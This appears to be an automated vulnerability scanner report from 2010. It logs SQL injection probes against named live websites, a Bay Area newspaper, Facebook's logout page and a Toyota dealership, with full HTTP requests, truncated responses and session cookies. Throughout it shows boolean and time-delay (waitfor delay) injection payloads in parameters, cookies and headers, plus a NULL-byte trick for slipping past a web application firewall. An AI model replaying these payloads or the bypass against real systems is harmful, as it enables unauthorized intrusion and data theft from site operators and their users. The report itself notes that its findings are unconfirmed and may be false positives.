<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><META NAME='description' CONTENT='The owners of the El Balazo restaurant chain have been charged with 20 counts of tax evasion, conspiracy and employing more than 60 illegal immigrants at their restaurants.'><meta name="keywords" content="news newsmainfront breaking crime accident police development city council government strike court disaster environment breaking news"/><title>Owners of El Balazo restaurant chain charged with tax fraud and hiring illegal immigrants - ContraCostaTimes.com</title><meta name="verify-v1" content="9dwSr9Yve34JXLjszyjsdM95FWP13xu2vUbiVSesr2I=" /> <meta name="msvalidate.01" content="9DAB14005AD5A9FFA4CA0EF58CC794BA" />
<Script language="JavaScript"> var CM8Server = "q1.checkm8.com"; var CM8Cat = "contracostatimes.News.Front"; var CM8Profile=""; </script> <SCRIPT language="JavaScript" src="http://q1digital.checkm8.com/adam/cm8adam_1_call.js"></SCRIPT><!-- get profile info --><!-- user not logged in (javascript) --><script language="JavaScript" type="text/javascript"> MNGiRegistrationLoginStatus = "out"; MNGiRegistrationUserName = ""; MNGiRegistrationEmail = ""; </script><!-- end get prof ...[SNIP]...
Request 2
GET /news/ci_16792343?source=rss&nclick_check=133516214'%20or%201%3d2--%20 HTTP/1.1 Host: www.contracostatimes.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: UserType=Browser; currBrandCheck=mngicctimes; s_cc=true; SOURCE=top-hp-promo-box-photo; u=COOKIE_NAME%3Du%3BuserIdChange%3Dtrue%3BuserId%3DZ4PETROM1AFIICUUCBWCFFI%3BconPage%3Dfalse%3BaaPage%3Dfalse%3BloginConPage%3Dfalse%3BfPage%3Dtrue%3BfVisit%3Dtrue%3BvType%3D1%3BlVisit%3D1291762325530%3BcVisit%3D1291762325530%3BinitRegType%3DVoluntary%3B; JSESSIONID=Z4PETROM1AFIICUUCBWCFFI; EMETA_COOKIE_CHECK_MNGI=1; s_sq=%5B%5BB%5D%5D; UserID=Z4PETROM1AFIICUUCBWCFFI; fPage=true; EMETA_NCLICK_MNGI=2;
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><META NAME='description' CONTENT='The owners of the El Balazo restaurant chain have been charged with 20 counts of tax evasion, conspiracy and employing more than 60 illegal immigrants at their restaurants.'><meta name="keywords" content="news newsmainfront breaking crime accident police development city council government strike court disaster environment breaking news"/><title>Owners of El Balazo restaurant chain charged with tax fraud and hiring illegal immigrants - ContraCostaTimes.com</title><meta name="verify-v1" content="9dwSr9Yve34JXLjszyjsdM95FWP13xu2vUbiVSesr2I=" /> <meta name="msvalidate.01" content="9DAB14005AD5A9FFA4CA0EF58CC794BA" />
<Script language="JavaScript"> var CM8Server = "q1.checkm8.com"; var CM8Cat = "contracostatimes.News.Front"; var CM8Profile=""; </script> <SCRIPT language="JavaScript" src="http://q1digital.checkm8.com/adam/cm8adam_1_call.js"></SCRIPT><!-- get profile info --><!-- user not logged in (javascript) --><script language="JavaScript" type="text/javascript"> MNGiRegistrationLoginStatus = "out"; MNGiRegistrationUserName = ""; MNGiRegistrationEmail = ""; </script><!-- end get profile info --><script language="JavaScript" type="text/javascript"> MNGiRegistrationLo ...[SNIP]...
The source parameter appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted in the source parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.
Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.
Request 1
GET /samesexmarriage/ci_16792108?source=most_viewed'%20and%201%3d1--%20 HTTP/1.1 Host: www.contracostatimes.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: UserType=Browser; currBrandCheck=mngicctimes; s_cc=true; SOURCE=top-hp-promo-box-photo; u=COOKIE_NAME%3Du%3BuserIdChange%3Dtrue%3BuserId%3DZ4PETROM1AFIICUUCBWCFFI%3BconPage%3Dfalse%3BaaPage%3Dfalse%3BloginConPage%3Dfalse%3BfPage%3Dtrue%3BfVisit%3Dtrue%3BvType%3D1%3BlVisit%3D1291762325530%3BcVisit%3D1291762325530%3BinitRegType%3DVoluntary%3B; JSESSIONID=Z4PETROM1AFIICUUCBWCFFI; EMETA_COOKIE_CHECK_MNGI=1; s_sq=%5B%5BB%5D%5D; UserID=Z4PETROM1AFIICUUCBWCFFI; fPage=true; EMETA_NCLICK_MNGI=2;
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><META NAME='description' CONTENT='In more than two hours of legal sparring, lawyers on both sides of the battle over the states ban on same-sex marriage were at various times pressed by each of the three 9th U.S. Circuit of Appeals judges hearing the challenge to Proposition 8.'><meta name="keywords" content="samesex marriage gay supreme court alameda contra costa county clerk"/><title>Appeals Court judges appear inclined to support gay marriage - ContraCostaTimes.com</title><meta name="verify-v1" content="9dwSr9Yve34JXLjszyjsdM95FWP13xu2vUbiVSesr2I=" /> <meta name="msvalidate.01" content="9DAB14005AD5A9FFA4CA0EF58CC794BA" />
<!-- get profile info --><!-- user not logged in (javascript) --><script language="JavaScript" type="text/javascript"> MNGiRegistrationLoginStatus = "out"; MNGiRegistrationUserName = ""; MNGiRegistrationEmail = ""; </script><!-- end get profile info --><script language="JavaScript" type="text/javascript"> MNGiRegistrationLoginUrl = "https://secure.passport.mnginteractive.com/mngi/servletDispatch/ErightsPassportServlet.dyn"; MNGiRegistrationUrl = "https://secure.www.contracostatimes.com"; MN ...[SNIP]...
Request 2
GET /samesexmarriage/ci_16792108?source=most_viewed'%20and%201%3d2--%20 HTTP/1.1 Host: www.contracostatimes.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: UserType=Browser; currBrandCheck=mngicctimes; s_cc=true; SOURCE=top-hp-promo-box-photo; u=COOKIE_NAME%3Du%3BuserIdChange%3Dtrue%3BuserId%3DZ4PETROM1AFIICUUCBWCFFI%3BconPage%3Dfalse%3BaaPage%3Dfalse%3BloginConPage%3Dfalse%3BfPage%3Dtrue%3BfVisit%3Dtrue%3BvType%3D1%3BlVisit%3D1291762325530%3BcVisit%3D1291762325530%3BinitRegType%3DVoluntary%3B; JSESSIONID=Z4PETROM1AFIICUUCBWCFFI; EMETA_COOKIE_CHECK_MNGI=1; s_sq=%5B%5BB%5D%5D; UserID=Z4PETROM1AFIICUUCBWCFFI; fPage=true; EMETA_NCLICK_MNGI=2;
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><META NAME='description' CONTENT='In more than two hours of legal sparring, lawyers on both sides of the battle over the states ban on same-sex marriage were at various times pressed by each of the three 9th U.S. Circuit of Appeals judges hearing the challenge to Proposition 8.'><meta name="keywords" content="samesex marriage gay supreme court alameda contra costa county clerk"/><title>Appeals Court judges appear inclined to support gay marriage - ContraCostaTimes.com</title><meta name="verify-v1" content="9dwSr9Yve34JXLjszyjsdM95FWP13xu2vUbiVSesr2I=" /> <meta name="msvalidate.01" content="9DAB14005AD5A9FFA4CA0EF58CC794BA" />
The campaign_click_url cookie appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted in the campaign_click_url cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.
Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.
Request 1
GET /logout.php HTTP/1.1 Host: www.facebook.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: datr=1285988221-da9465b31b1cec814c13f1f6b4ae65cdbc0d9239959dc268afeca; wd=450x40; campaign_click_url=%2Fcampaign%2Fimpression.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dnews1reports.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fnews1reports.com%252Fdefault-js.asp%253Fview%253D0%2526funnelid%253DF180%2526a%253Db%2526siteid%253DAPS%2526vid%253Dctt_id%253D%2526ctt_adnw%253D%2526ctt_ch%253D%2526ctt_entity%253D%2526ctt_cli%253D%2526ctt_kw%253D%2526ctt_adid%253D%2526ctt_nwtype%253D%26extra_2%3DUS'%20and%201%3d1--%20;
Response 1 (redirected)
HTTP/1.1 200 OK Cache-Control: private, no-cache, no-store, must-revalidate Expires: Sat, 01 Jan 2000 00:00:00 GMT P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p" Pragma: no-cache Set-Cookie: lsd=e0q9u; path=/; domain=.facebook.com Set-Cookie: noscript=1; path=/; domain=.facebook.com Set-Cookie: reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F; path=/; domain=.facebook.com Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2F; path=/; domain=.facebook.com Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly Content-Type: text/html; charset=utf-8 Connection: close Date: Wed, 08 Dec 2010 01:55:25 GMT Content-Length: 14018
<link rel="search" type="application/opensearchdescription+xml" href="http://b.static.ak.fbcdn.net/rsrc.php/zJ/r/H2SSvhJMJA-.xml" title="Facebook" /> <link rel="shortcut icon" href="http://static.ak.fbcdn.net/rsrc.php/z7/r/5875srnzL-I.ico" /></head> <body class="WelcomePage UIPage_LoggedOut ie7 win Locale_en_US"> <div id="FB_HiddenContainer" style="position:absolute; top:-10000px; width:0px; height:0px;" ></div><div id="blueBar" class="loggedOut"></div><div id="globalContainer"><div id="dialogContainer"></div><div id="dropmenu_container"></div><div id="content" class="fb_content clearfix"><div ><!-- 2365fa3194ecdc0cab15721ce967a9f8663937c7 --> <div class="WelcomePage_Container"><div class="loggedout_menubar_container"><div class="clearfix loggedout_menubar"><a class="lfloat" href="/" title="Go to Facebook Home"><i class="fb_logo img spritemap_aanaup sx_cd927a" title="Facebook logo"></i></a><div class="rfloat"></div></div></div><div class="WelcomePage_MainSell"><div class="WelcomePage_MainSellCenter clearfix"><div class="WelcomePage_Warnings"><div id="standard_status" class="UIMessageBox status"><h2 class="main_message">Javascript is disabled on your browser. Please enable JavaScript or upgrade to a Javascript-capable browser to use Facebook. Alternativly, you can access the mobile version of Facebook <a href="http://m.facebook.com/">here</a>.</h2><p class="sub_message"></p></div></div><div class="WelcomePage_MainSellLeft"><div class="WelcomePage_MainMessage">Facebook helps you connect and share with the people in your life.</div><div class="WelcomePage_MainMap"> </div></div><div class="WelcomePage_MainSellRig ...[SNIP]...
Request 2
GET /logout.php HTTP/1.1 Host: www.facebook.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: datr=1285988221-da9465b31b1cec814c13f1f6b4ae65cdbc0d9239959dc268afeca; wd=450x40; campaign_click_url=%2Fcampaign%2Fimpression.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dnews1reports.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fnews1reports.com%252Fdefault-js.asp%253Fview%253D0%2526funnelid%253DF180%2526a%253Db%2526siteid%253DAPS%2526vid%253Dctt_id%253D%2526ctt_adnw%253D%2526ctt_ch%253D%2526ctt_entity%253D%2526ctt_cli%253D%2526ctt_kw%253D%2526ctt_adid%253D%2526ctt_nwtype%253D%26extra_2%3DUS'%20and%201%3d2--%20;
Response 2 (redirected)
HTTP/1.1 200 OK Cache-Control: private, no-cache, no-store, must-revalidate Expires: Sat, 01 Jan 2000 00:00:00 GMT P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p" Pragma: no-cache Set-Cookie: lsd=k47Eg; path=/; domain=.facebook.com Set-Cookie: noscript=1; path=/; domain=.facebook.com Set-Cookie: reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F; path=/; domain=.facebook.com Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2F; path=/; domain=.facebook.com Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly Content-Type: text/html; charset=utf-8 Connection: close Date: Wed, 08 Dec 2010 01:55:26 GMT Content-Length: 14148
<link rel="search" type="application/opensearchdescription+xml" href="http://b.static.ak.fbcdn.net/rsrc.php/zJ/r/H2SSvhJMJA-.xml" title="Facebook" /> <link rel="shortcut icon" href="http://static.ak.fbcdn.net/rsrc.php/z7/r/5875srnzL-I.ico" /></head> <body class="WelcomePage UIPage_LoggedOut ie7 win Locale_en_US"> <div id="FB_HiddenContainer" style="position:absolute; top:-10000px; width:0px; height:0px;" ></div><div id="blueBar" class="loggedOut"></div><div id="globalContainer"><div id="dialogContainer"></div><div id="dropmenu_container"></div><div id="content" class="fb_content clearfix"><div ><!-- 2365fa3194ecdc0cab15721ce967a9f8663937c7 --> <div class="WelcomePage_Container"><div class="loggedout_menubar_container"><div class="clearfix loggedout_menubar"><a class="lfloat" href="/" title="Go to Facebook Home"><i class="fb_logo img sp_aanaup sx_cd927a" title="Facebook logo"></i></a><div class="rfloat"></div></div></div><div class="WelcomePage_MainSell"><div class="WelcomePage_MainSellCenter clearfix"><div class="WelcomePage_Warnings"><div id="standard_status" class="UIMessageBox status"><h2 class="main_message">Javascript is disabled on your browser. Please enable JavaScript or upgrade to a Javascript-capable browser to use Facebook. Alternativly, you can access the mobile version of Facebook <a href="http://m.facebook.com/">here</a>.</h2><p class="sub_message"></p></div></div><div class="WelcomePage_MainSellLeft"><div class="WelcomePage_MainMessage">Facebook helps you connect and share with the people in your life.</div><div class="WelcomePage_MainMap"> </div></div><div class="WelcomePage_MainSellRight"><div cl ...[SNIP]...
The confid parameter appears to be vulnerable to SQL injection attacks. The payloads 11313056'%20or%201%3d1--%20 and 11313056'%20or%201%3d2--%20 were each submitted in the confid parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.
Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.
The User-Agent HTTP header appears to be vulnerable to SQL injection attacks. A single quote was submitted in the User-Agent HTTP header, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request 1
GET /Toyota-Dealer/Fremont/About%20Us/ HTTP/1.1 Host: www.fremonttoyota.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)%00' Connection: close Cookie: __utmz=198428792.1291762386.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); PHPSESSID=v8g9p8mq0ejk18m1jtpubu81s4; __utma=198428792.1988978089.1291762386.1291762386.1291762386.1; __utmc=198428792; __utmb=198428792; BIGipServerAPACHE_DEV=2936078602.20480.0000;
Response 1
HTTP/1.1 200 OK Date: Wed, 08 Dec 2010 02:22:17 GMT Server: Apache/2.2.14 (Ubuntu) DAV/2 PHP/5.3.2-1ubuntu4.5 with Suhosin-Patch mod_perl/2.0.4 Perl/v5.10.1 X-Powered-By: PHP/5.3.2-1ubuntu4.5 Set-Cookie: SOURCE=SEO; expires=Sat, 03-Dec-2011 02:22:19 GMT; path=/ Cache-Control: max-age=1 Expires: Wed, 08 Dec 2010 02:22:18 GMT Vary: Accept-Encoding,User-Agent P3P: CP="NOI DEVa TAIa OUR BUS UNI" Connection: close Content-Type: text/html Content-Length: 17374
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <HEAD> <TITLE>Toyota Dealer Servin ...[SNIP]... <br /> Thanks to our delightful location near Fremont, our exceptional Toyota products and services are available to our friendly neighbors all around Alameda County, and furthermore, to commuters throughout Northern California. Here at Fremont Toyota, you will discov ...[SNIP]...
Request 2
GET /Toyota-Dealer/Fremont/About%20Us/ HTTP/1.1 Host: www.fremonttoyota.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)%00'' Connection: close Cookie: __utmz=198428792.1291762386.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); PHPSESSID=v8g9p8mq0ejk18m1jtpubu81s4; __utma=198428792.1988978089.1291762386.1291762386.1291762386.1; __utmc=198428792; __utmb=198428792; BIGipServerAPACHE_DEV=2936078602.20480.0000;
Response 2
HTTP/1.1 200 OK Date: Wed, 08 Dec 2010 02:22:29 GMT Server: Apache/2.2.14 (Ubuntu) DAV/2 PHP/5.3.2-1ubuntu4.5 with Suhosin-Patch mod_perl/2.0.4 Perl/v5.10.1 X-Powered-By: PHP/5.3.2-1ubuntu4.5 Set-Cookie: SOURCE=SEO; expires=Sat, 03-Dec-2011 02:22:31 GMT; path=/ Cache-Control: max-age=1 Expires: Wed, 08 Dec 2010 02:22:30 GMT Vary: Accept-Encoding,User-Agent P3P: CP="NOI DEVa TAIa OUR BUS UNI" Connection: close Content-Type: text/html Content-Length: 17421
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <HEAD> <TITLE>Toyota Dealer Servin ...[SNIP]...
The __utma cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the __utma cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request 1
GET /Toyota-Dealer/Fremont/About%20Us/ HTTP/1.1 Host: www.fremonttoyota.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=198428792.1291762386.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); PHPSESSID=v8g9p8mq0ejk18m1jtpubu81s4; __utma=198428792.1988978089.1291762386.1291762386.1291762386.1%00'; __utmc=198428792; __utmb=198428792; BIGipServerAPACHE_DEV=2936078602.20480.0000;
Response 1
HTTP/1.1 200 OK Date: Wed, 08 Dec 2010 02:04:16 GMT Server: Apache/2.2.14 (Ubuntu) DAV/2 PHP/5.3.2-1ubuntu4.5 with Suhosin-Patch mod_perl/2.0.4 Perl/v5.10.1 X-Powered-By: PHP/5.3.2-1ubuntu4.5 Set-Cookie: SOURCE=SEO; expires=Sat, 03-Dec-2011 02:04:17 GMT; path=/ Cache-Control: max-age=1 Expires: Wed, 08 Dec 2010 02:04:17 GMT Vary: Accept-Encoding,User-Agent P3P: CP="NOI DEVa TAIa OUR BUS UNI" Connection: close Content-Type: text/html Content-Length: 17447
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <HEAD> <TITLE>Toyota Dealer Servin ...[SNIP]... <br /> Thanks to our delightful location near Fremont, our exceptional Toyota products and services are available to our friendly neighbors all around Alameda County, and furthermore, to commuters throughout Northern California. What you'll find at Fremont Toyota is t ...[SNIP]...
Request 2
GET /Toyota-Dealer/Fremont/About%20Us/ HTTP/1.1 Host: www.fremonttoyota.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=198428792.1291762386.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); PHPSESSID=v8g9p8mq0ejk18m1jtpubu81s4; __utma=198428792.1988978089.1291762386.1291762386.1291762386.1%00''; __utmc=198428792; __utmb=198428792; BIGipServerAPACHE_DEV=2936078602.20480.0000;
Response 2
HTTP/1.1 200 OK Date: Wed, 08 Dec 2010 02:04:22 GMT Server: Apache/2.2.14 (Ubuntu) DAV/2 PHP/5.3.2-1ubuntu4.5 with Suhosin-Patch mod_perl/2.0.4 Perl/v5.10.1 X-Powered-By: PHP/5.3.2-1ubuntu4.5 Set-Cookie: SOURCE=SEO; expires=Sat, 03-Dec-2011 02:04:23 GMT; path=/ Cache-Control: max-age=1 Expires: Wed, 08 Dec 2010 02:04:23 GMT Vary: Accept-Encoding,User-Agent P3P: CP="NOI DEVa TAIa OUR BUS UNI" Connection: close Content-Type: text/html Content-Length: 16910
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <HEAD> <TITLE>Toyota Dealer Servin ...[SNIP]...
The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. The payload ',0,0)waitfor%20delay'0%3a0%3a20'-- was submitted in the REST URL parameter 1. The application took 17557 milliseconds to respond to the request, compared with 1841 milliseconds for the original request, indicating that the injected SQL command caused a time delay.
The database appears to be Microsoft SQL Server.
Request
GET /Toyota-Dealer',0,0)waitfor%20delay'0%3a0%3a20'--/San%20Leandro/About%20Us/ HTTP/1.1 Host: www.fremonttoyota.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=198428792.1291762386.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); PHPSESSID=v8g9p8mq0ejk18m1jtpubu81s4; __utma=198428792.1988978089.1291762386.1291762386.1291762386.1; __utmc=198428792; __utmb=198428792; BIGipServerAPACHE_DEV=2936078602.20480.0000;
Response
HTTP/1.1 404 Not Found Date: Wed, 08 Dec 2010 03:05:44 GMT Server: Apache/2.2.14 (Ubuntu) DAV/2 PHP/5.3.2-1ubuntu4.5 with Suhosin-Patch mod_perl/2.0.4 Perl/v5.10.1 X-Powered-By: PHP/5.3.2-1ubuntu4.5 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Vary: Accept-Encoding,User-Agent P3P: CP="NOI DEVa TAIa OUR BUS UNI" Connection: close Content-Type: text/html Content-Length: 47928
<!DOCTYPE HTML> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> <title>Fremont Toyota - Toyota - Serving Oakland - Serving San Jose - Serving Stockton - Serving Watso ...[SNIP]...
The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. The payload ',0,0)waitfor%20delay'0%3a0%3a20'-- was submitted in the REST URL parameter 1. The application took 54409 milliseconds to respond to the request, compared with 11073 milliseconds for the original request, indicating that the injected SQL command caused a time delay.
The database appears to be Microsoft SQL Server.
Request
GET /Toyota',0,0)waitfor%20delay'0%3a0%3a20'--/Corolla/ HTTP/1.1 Host: www.fremonttoyota.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=198428792.1291762386.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); PHPSESSID=v8g9p8mq0ejk18m1jtpubu81s4; __utma=198428792.1988978089.1291762386.1291762386.1291762386.1; __utmc=198428792; __utmb=198428792; BIGipServerAPACHE_DEV=2936078602.20480.0000;
Response
HTTP/1.1 404 Not Found Date: Wed, 08 Dec 2010 03:40:49 GMT Server: Apache/2.2.14 (Ubuntu) DAV/2 PHP/5.3.2-1ubuntu4.5 with Suhosin-Patch mod_perl/2.0.4 Perl/v5.10.1 X-Powered-By: PHP/5.3.2-1ubuntu4.5 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Vary: Accept-Encoding,User-Agent P3P: CP="NOI DEVa TAIa OUR BUS UNI" Connection: close Content-Type: text/html Content-Length: 47942
<!DOCTYPE HTML> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> <title>Fremont Toyota - Toyota - Serving Oakland - Serving San Jose - Serving Stockton - Serving Watso ...[SNIP]...
The __utmb cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the __utmb cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request 1
GET /Toyota/Highlander%20Hybrid/ HTTP/1.1 Host: www.fremonttoyota.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=198428792.1291762386.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); PHPSESSID=v8g9p8mq0ejk18m1jtpubu81s4; __utma=198428792.1988978089.1291762386.1291762386.1291762386.1; __utmc=198428792; __utmb=198428792%00'; BIGipServerAPACHE_DEV=2936078602.20480.0000;
Response 1
HTTP/1.1 200 OK Date: Wed, 08 Dec 2010 02:26:52 GMT Server: Apache/2.2.14 (Ubuntu) DAV/2 PHP/5.3.2-1ubuntu4.5 with Suhosin-Patch mod_perl/2.0.4 Perl/v5.10.1 X-Powered-By: PHP/5.3.2-1ubuntu4.5 Set-Cookie: SOURCE=SEO; expires=Sat, 03-Dec-2011 02:26:54 GMT; path=/ Cache-Control: max-age=1 Expires: Wed, 08 Dec 2010 02:26:53 GMT Vary: Accept-Encoding,User-Agent P3P: CP="NOI DEVa TAIa OUR BUS UNI" Connection: close Content-Type: text/html Content-Length: 25507
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <HEAD> <TITLE>2011 Toyota Highland ...[SNIP]... ority are abundant in the stylish 2011 Toyota Highlander Hybrid package. The all new Highlander Hybrid is exalted and for good reason; it boasts only the highest quality in features and design without exception. <br /> ...[SNIP]...
Request 2
GET /Toyota/Highlander%20Hybrid/ HTTP/1.1 Host: www.fremonttoyota.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=198428792.1291762386.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); PHPSESSID=v8g9p8mq0ejk18m1jtpubu81s4; __utma=198428792.1988978089.1291762386.1291762386.1291762386.1; __utmc=198428792; __utmb=198428792%00''; BIGipServerAPACHE_DEV=2936078602.20480.0000;
Response 2
HTTP/1.1 200 OK Date: Wed, 08 Dec 2010 02:27:09 GMT Server: Apache/2.2.14 (Ubuntu) DAV/2 PHP/5.3.2-1ubuntu4.5 with Suhosin-Patch mod_perl/2.0.4 Perl/v5.10.1 X-Powered-By: PHP/5.3.2-1ubuntu4.5 Set-Cookie: SOURCE=SEO; expires=Sat, 03-Dec-2011 02:27:10 GMT; path=/ Cache-Control: max-age=1 Expires: Wed, 08 Dec 2010 02:27:10 GMT Vary: Accept-Encoding,User-Agent P3P: CP="NOI DEVa TAIa OUR BUS UNI" Connection: close Content-Type: text/html Content-Length: 25654
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <HEAD> <TITLE>2011 Toyota Highland ...[SNIP]...
The Referer HTTP header appears to be vulnerable to SQL injection attacks. A single quote was submitted in the Referer HTTP header, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
Request 1
GET /Toyota/Sequoia/ HTTP/1.1 Host: www.fremonttoyota.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=198428792.1291762386.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); PHPSESSID=v8g9p8mq0ejk18m1jtpubu81s4; __utma=198428792.1988978089.1291762386.1291762386.1291762386.1; __utmc=198428792; __utmb=198428792; BIGipServerAPACHE_DEV=2936078602.20480.0000; Referer: http://www.google.com/search?hl=en&q='
Response 1
